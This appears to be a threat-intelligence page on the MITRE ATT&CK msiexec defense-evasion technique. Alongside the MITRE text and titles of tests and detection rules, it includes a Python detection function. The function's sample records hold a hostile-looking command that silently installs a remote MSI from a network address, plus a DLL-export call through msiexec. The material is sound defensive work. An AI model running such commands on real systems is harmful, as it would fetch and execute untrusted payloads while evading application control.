T1218.007: Msiexec
| View on MITRE ATT&CK | T1218.007 |
|---|---|
| Tactic(s) | Defense Evasion |
Data from MITRE ATT&CK®:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
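The description above says msiexec.exe can run local or network-accessible MSI packages and call DLL exports, and the detection data components on this page point at process-creation telemetry as the place to see it. The following is an added example, not part of the MITRE, Sigma or Atomic Red Team material on this page: a small Python triage function over constructed Sysmon-style process-creation records that flags the command-line traits the Sigma rule titles below name (quiet switches, a URL or UNC package path, the /y and /z DLL export switches); the script-host parent heuristic and every sample value are assumptions.

```python
import re

# Constructed records in the shape of Sysmon Event ID 1 (Process Creation); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\vendor-tool.msi" /qb',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://203.0.113.10/update.msi",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'msiexec.exe /y "C:\Users\Public\helper.dll"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')                                  # keep quoted paths whole
QUIET_RE = re.compile(r"^[/-](?:q[nbrf+!-]*|quiet)$", re.IGNORECASE)   # /q, /qn, /qb, /quiet
REMOTE_RE = re.compile(r"^(?:https?://|\\\\)", re.IGNORECASE)          # URL or UNC package path
DLL_FLAG_RE = re.compile(r"^[/-][yz]$", re.IGNORECASE)                 # /y and /z DLL export calls
# Parents that suggest a scripted rather than interactive install (heuristic chosen for this example).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def analyze_event(event: dict) -> list[str]:
    """Return the T1218.007 indicators present in one process-creation record."""
    if _basename(event.get("Image", "")) != "msiexec.exe":
        return []
    tokens = [t.strip('"') for t in TOKEN_RE.findall(event.get("CommandLine", ""))]
    findings = []
    for i, tok in enumerate(tokens):
        if QUIET_RE.match(tok):
            findings.append("quiet_install")
        elif REMOTE_RE.match(tok):
            findings.append("remote_package")
        elif DLL_FLAG_RE.match(tok):
            export = "DllRegisterServer" if tok[1].lower() == "y" else "DllUnregisterServer"
            target = tokens[i + 1] if i + 1 < len(tokens) else "<missing>"
            findings.append(f"dll_export_call:{export}:{target}")
    parent = _basename(event.get("ParentImage", ""))
    if parent in SCRIPT_HOSTS:
        findings.append(f"scripting_parent:{parent}")
    return findings

def is_suspicious(findings: list[str]) -> bool:
    """Quiet installs alone are routine; remote packages, DLL export calls, or a quiet install from a script host are not."""
    return any(f.startswith(("remote_package", "dll_export_call")) for f in findings) or (
        "quiet_install" in findings and any(f.startswith("scripting_parent") for f in findings))
```

Run `analyze_event` over each record and feed the result to `is_suspicious`; the first sample is an ordinary interactive install and stays quiet, the other two are flagged.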
Cyber Threat Graph Context
Explore how this ATT&CK Technique relates to the wider threat graph
Reporting on this Technique
Connect:fun Detailing an exploitation campaign targeting FortiClient EMS via CVE-2023-48788
This report from Vedere Labs at Forescout Research details an exploitation campaign which they have designated Connect:fun. The attacks exploit ...
Mitigations for this technique
MITRE ATT&CK Mitigations
How to detect this technique
MITRE ATT&CK Data Components
Module Load (Module)
Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)
Process Creation (Process)
The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)
Network Connection Creation (Network Traffic)
Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)
Command Execution (Command)
The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc.)
Control Validation Tests for this Technique
Use Atomic Red Team tests to test your defenses against this technique.
WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
Msiexec.exe - Execute Local MSI file with an embedded DLL
WMI Win32_Product Class - Execute Local MSI file with embedded JScript
WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Msiexec.exe - Execute Local MSI file with embedded VBScript
Msiexec.exe - Execute Local MSI file with embedded JScript
Msiexec.exe - Execute Local MSI file with an embedded EXE
Msiexec.exe - Execute the DllRegisterServer function of a DLL
Msiexec.exe - Execute Remote MSI file
WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
Sigma Detections for this Technique
Msiexec Quiet Installation
Suspicious Msiexec Execute Arbitrary DLL
PowerShell WMI Win32_Product Install MSI
Suspicious MsiExec Embedding Parent
MsiExec Web Install
DllUnregisterServer Function Call Via Msiexec.EXE
Suspicious Msiexec Quiet Install From Remote Location
MSI Installation From Web
Msiexec.EXE Initiated Network Connection Over HTTP
SP800-53 Controls
See which controls can help protect against this MITRE ATT&CK technique. This is based on mappings to associated SP800-53 controls produced by the MITRE Engenuity Center for Threat-Informed Defense.